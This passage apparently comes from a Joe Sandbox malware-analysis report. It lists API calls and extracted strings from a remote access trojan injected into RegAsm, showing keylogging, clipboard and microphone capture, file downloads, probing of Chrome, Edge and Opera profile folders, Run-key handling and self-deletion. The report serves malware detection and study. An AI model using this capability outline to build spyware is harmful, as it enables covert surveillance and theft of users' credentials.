                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 3919263394-0
                                                                APIs
                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcess
                                                                • String ID:
                                                                • API String ID: 39102293-0
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                APIs
                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID:
                                                                • API String ID: 4116985748-0
                                                                APIs
                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                • String ID:
                                                                • API String ID: 1761009282-0
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                • API String ID: 1881088180-3686566968
                                                                APIs
                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ACP$OCP
                                                                • API String ID: 0-711371036
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 481472006-1507639952
                                                                APIs
                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadFileSleep
                                                                • String ID: !D@
                                                                • API String ID: 1931167962-604454484
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                • API String ID: 481472006-2430845779
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: alarm.wav$hYG
                                                                • API String ID: 1174141254-2782910960
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                • String ID: Online Keylogger Stopped
                                                                • API String ID: 1623830855-1496645233
                                                                APIs
                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferHeaderPrepare
                                                                • String ID: XMG
                                                                • API String ID: 2315374483-813777761
                                                                APIs
                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocaleValid
                                                                • String ID: IsValidLocaleName$kKD
                                                                • API String ID: 1901932003-3269126172
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                • API String ID: 1174141254-4188645398
APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• API String ID: 1174141254-2800177040
APIs
• PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
Similarity
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable\
• API String ID: 1174141254-1629609700
APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
Similarity
• API ID: ExecuteShell
• String ID: !D@$open
• API String ID: 587946157-1586967515
APIs
• GetKeyState.USER32(00000012), ref: 0040B6E0
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
APIs
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• __Init_thread_footer.LIBCMT ref: 00410F64
Similarity
• API ID: Init_thread_footer__onexit
• String ID: ,kG$0kG
• API String ID: 1881088180-2015055088
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
• WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
• GetLastError.KERNEL32 ref: 00440D85
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• API String ID: 1717984340-0
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
• SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
Similarity
• API ID: ErrorLastRead
• API String ID: 4100373531-0